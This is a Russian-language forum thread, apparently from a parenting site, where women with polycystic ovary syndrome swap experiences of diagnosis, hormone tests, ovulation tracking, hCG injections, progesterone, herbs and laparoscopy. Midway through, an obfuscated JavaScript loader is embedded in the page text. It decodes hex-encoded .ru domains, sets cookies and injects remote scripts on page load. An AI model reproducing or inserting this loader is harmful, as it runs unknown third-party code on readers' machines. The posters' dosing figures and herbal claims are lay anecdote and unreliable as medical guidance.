приветик, девочки у кого поставили поликистоз давайте дружить, поддерживать друг друга в нашем деле, делится советами
Привет) и мне ставят СПКЯ по узи иногда, но гормоны в норме, были две Б, наступали сами, но закончились,увы,выкидышами(( а вам СПКЯ как поставили-по узи,анализам?
Ага, УЗИ и гормоны у меня на страницы есть фото гормонов и прогестерон был пониженный
Я слышала что тут надо в комплексе и УЗИ и анализы что бы поставить диагноз и тут ещё важно есть овуляция тли нет если нет то это намного сложнее , а почему выудивши были причину ищут ?
Да,Кать, я тоже много слышала и читала,что спкя ставят в комплексе анализируя неоднократные узи, гормоны,в т.ч.соотношение ЛГ/ФСГ,ну и наличие овуляции,конечно же! У меня О бывает,но не всегда,чаще фоликул растет,но не лопается( мне предлагали лапару,я сначала согласилась, но девчонки здесь меня отговорили,потому что две Б у меня наступали... Одна врач только сказала,что причина В как раз спкя. Но я была ни у одного и даже ни у двух врачей и больше никто этого не подтвердил. причину полгода искала, нашли только незначительно повышенные антитела к хгч и афс, но буду их пересдавать, т.к.в одной лабе вообще отрицательный анализ, в другой слабоположительный...
Либо как забеременеешь сразу на сохранение , пусть в больничке врачи своё дело делают все таки 2 выкидыша
Привет)) мне тоже поликистоз по узи поставили. Все гормоны в норме. Но не смотря на это врач всё равно кормила меня прогестероном 4 месяца. Я уже курс допила, завтра пойду к ней с вопросом "что дальше?". Вы сдавали анализ на инсулинозависимость? Мне девушка на этом сайте посоветовала сдать. Так что завтра буду просить у врача чтобы добавила мне этот анализ к общему списку))
Я не сдавала, собиралась в том году, но узнала о Б, так и не сдала его. Моя Г считает,что для меня он лишний, т.к.нет лишнего веса, скорее наоборот, растительности тоже нет) в общем, поликистоза в чистом виде нет) девочки здесь мне сказали,что у меня скорее мфя, но при них объём Я в норме, а у меня увеличен,причём сильно( а у вас своя О есть?
О никогда не отслеживала, так как мы с моим МЧ любим друг друга каждый день
поэтому пропустить невозможно. Но теперь, хочу тесты на О поделать просто чтобы узнать есть она вообще или нет. По поводу инсулина, я тоже худая и не волосатая, но на прошлой неделе померила глюкометром сахар - 7,1. По поводу прогестерона, тоже слышала, о том что О забивает и я в это верю, но принимала как назначил врач, специально чтобы проверить есть толк от такого вида лечения или нет.
Пишут что при спкя тесты на О недостоверны, якобы всегда положительные, но у меня не так. И всё же я не особо доверяю тестам, я хожу на фолликулометрию, там уж точно скажут, есть О или нет. Правда, не один раз надо будет сходить, у меня в этом цикле получилось вообще 5 раз( обычно трёх достаточно. А цикл у вас регулярный?
нет, всегда то на неделю раньше, то позже. На фолликулометрию начну ходить когда все анализы сдам. Мне врач сегодня сказала немного расслабиться, сдать кровь на сахар и отправить моего МЧ на спермограмму, только после этого продолжим лечение.
У меня тесты на овуляцию постоянно полосатые ((( попала слабак вторая но есть , особо не отслеживаю но делаю иногда , вот хочу со след цикла базальную начать мерить
Кать, так слабая всегда и бывает, так у всех. Надо чтобы контрольная была ярче тестовой полоски) бт сама второй цикл только измеряю)
А я маме дала сделать у неё прям чистая а у меня с полоской вот и подумала , надо понаблюдать ))
В прошлом цикле О была и по узи, и по бт. В этом цикле О тоже подтвердили по узи, но я колола хгч, а вот бт почему-то не хочет расти(
Да,когда он будет от 18 мм, можно колоть, но эндометрий тоже должен быть не менее 8 мм при этом. Моя Г так говорила.
Надо у своей спросить завтра , а их в аптеке покупать можно? У них дозировка одна?
Колоть только под контролем УЗИ!!!! В аптеках продается, 5000 единиц-это 5 ампул по 1000 единиц. Обычно назначают 10000, но мне хватает и 5000) Кать, конечно, с врачом это только решать и после узи, как правило,неоднократного. Я хожу на фолликулометрию на 5 дц, потом 10-12, и уже после укола, посмотреть, есть ли ЖТ.
Это понятно , без врача я максимум витамин и травы какие-нибудь попью , я просто из России уезжаю на несколько месяцев и конечно стимуляция мне никак там к врачу надо постоянно а УЗИ это полегче заграницей , вот спросить надо , но ч думаю скажут пока так пробуй , обещала после эндокринолога ещё таблеток назначит
Я бы с травами поосторожнее была, при спкя много нельзя из того,что обычно девчонки пьют, тот же шалфей. А витамины очень кстати будут)
Тоже сегодня спрошу, про шалфей ссоышала, хочу узнать про бурую матку, красную щётку и ромашку, вчера поначиталась тоже про траву и думаю нееее лучше подожду и прошу
А по поводу прогестерона моё мнение если пить, то только после О, а не как врачи назначают с 16 по 25 дц. Я не пила, но теперь если будем планировать,придётся, т.к диагноз у меня теперь ещё и привычное невынашивание'(
Привет! Мне кажется, что самое первое - это анализ на гормоны и узи. Если с гормонами не все впорядке, то приводить их в норму и следить за овуляцией, есть ли она вообще. Если есть - вперед стараться ))))) Ну и конечно, найти своего врача, грамотного. Я сейчас отслеживаю овулю тестами, так как первый месяц после ОК, решила не заморачиваться с узи. На следующий цикл, надеюсь он не наступит и я увижу //, уже сдаю контрольный анализ, так как были высокие мужские гормоны и заморочусь с узи.
У меня после ок (пила 6,5 лет) месячные не приходили выпила Дюфастон и пришли на 87 дц, тестостерон повышен , 17 он прогестерон тоже , что ещё и прогестерон пониженым почему т Дюфастон назначили , УЗИ тоже поликистоз , вот ещё раз после эндокринолога в пятницу к гине пойду какие ещё таблетки назначит ))) овуляции как бы у меня нет , но надеюсь на чудо в лежащие 3 месяца и худею )))
Поликистоз не лечится. Главная цель в лечении-беременность))) Ну тут уж кто какими методами этого добивается) Кто-то, действительно пытается похудеть. Лично у меня не выходит. Пробовала много чего. Сейчас на ПП. ОК пила 3 месяца для понижения гормонов. Побочек не было, но больше пить не буду. В этот цикл, а если не получится, то и в следующий пробуем сами, потом стимуляция, просто не вижу смысла ждать у моря погоды. Если и это не поможет, то лапара, но, надеюсь, до этого не дойдёт )))))
Стимуляция должна проходить под присмотром врача кажется ? А у меня муж не в России вот поеду к нему , поэтому если сами не сможем мне сразу только вариант с лепарой, да иногда мним виду его только раз в неделю ((( так что в моем случаем ждём чуда )))
Да, безусловно, только под присмотром врача. Я сейчас ещё шалфей пью. Блин, читала где-то, что он помогает расти фоликам и эндометрию) Ну это мой личный эксперимент в этом цикле ) Посмотрим, что будет ) Просто у меня с ОК отдельная история, что вообще не понятно какой сейчас день цикла и когда должны придти следующие М. Тоже надеюсь на чудо ) Прям ооочень )
Шалфей при поликистозе низя я читала, если надо найду в инете а другие травы можнл типо ромашки вот помню , борая матка , не помню все хочу тоже попробовать
Шалфей нельзя, если эстрадиол в норме или повышен. У меня он понижен. Ну посмотрим, все равно )))
Ааа))) на такой гормон я не сдавала , так что рисковать не буду другую травку попью и имбири заваривать буду и в чай добавлять )))
приветик
у меня тоже поликистоз
так врачи говорят 7 мес пролетов пока что
У меня на 5 курсе института 6 месяцев мазня была поставили диагноз поликистоз 6,5 лет пила ок , вот теперь хотим Лялю , но кормоны не в норме да фолликулы на яичниках , вот и поставили опять диагноз поликтстоз (((( я тут почитала , поняла надо худеть первое дело, и врач сказала всякое в жизни бывает попробуй забеременеть, вот в марте поеду к мужу 3 месяца будет на это, сейчас пью витамины фемибион1 там и йод и фолиевая и витамин Е
мне про похудеть не говорили нечего
Я у двух врачей наблюдаюсь одна послала к эндокринологу а другая которая заведует отдалением по планированию говорит тут поликистоз , хорошо что хоть на Дюфастон реагируешь, худеть начинай, попробуй потом приходи как вернёшься в Россию а сейчас если забеременеешь это подарок будет
Привет) у меня тоже спкя.. Забеременнела сразу же в первый цикл, но закончилось все замершей((( теперь вот уже полгода стараемся и никак( гиня назначила только утрожестан, дальше видно будет..
Вот и мне эти полтора года то и делают что дюфастон назначают(( Не помогает - факт.
Гинеколог мне утрик назначила, чтобы цикл хоть немного сократить.. Вот третий месяц допиваю и к ней.. Сказала будем пробовать беременеть медикаментозно, лапару на крайний случай оставила[removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["71786f696c69353670377938692e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="19798",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]
Приветик ! Меня зовут Мадина , мне 22 года , есть сыночек ( 2.4), второго никак не получается уже год . Ставят спкя , лг выше фсг в 1,5 раза , низкий эстрадиол , низкий прогестерон . По узи яичники не увеличены , есть ДФ, но овуляция не происходит , фолликулы не разрываются из-за плотной капсулы . Была 1 стимуляция, не помогла . Завтра иду на лапару 😌 Будут делать резекцию яичников и удалять кисту
Мне сказали тоже про лепару но говорят так попробуй а то не пробовала толком , а лепару она платная ?
Может где-то и делают бесплатно , но я делаю платно у хорошего врача
Привет)) я тоже к Вам, сколько себя помню постоянно не регулярно М, вес то вверх, то вниз, первая Б в 2010 Г после того как скинула вес, съездила с мужем на море, но тогда мы не планировали, анализы никакие не сдавала, В на сроке 5 нед. Около года приходила в себя, м потом пошла по врачам, выявили гипотериоз, ещё около года на наведение порядка в щитовидке, сказали что В из за этого был. В 2013 к репродуктологам обратилась тк беременности больше не наступали и ставили МФЯ, проблемы с овуляцией, решила не тянуть уже 28 лет и стимулировать овуляцию, после всех гсг, спермограммы, кучи анализов на все что только можно, итог вторая Б и роды в декабре 2013, сынок. Сейчас сыну 2 годика, мне 31, хотим второго, пошла к Г, опять анализы, лг, фсг в норме, амг повышен, поставили СПКЯ, овули 2 цикла нет, опять стимулируют овуляцию, сегодня 13дц, завтра на фолликулометрию, будем смотреть ДФ, а так пью пока метформин 1500, л тироксин, фольку. Желаю всем нам заветных //.
Привет!) и я со СПКЯ. Планируем и лечимся 1,5 года. Сейчас готовимся к стимуляции. Будут капельницы и проверка труб.
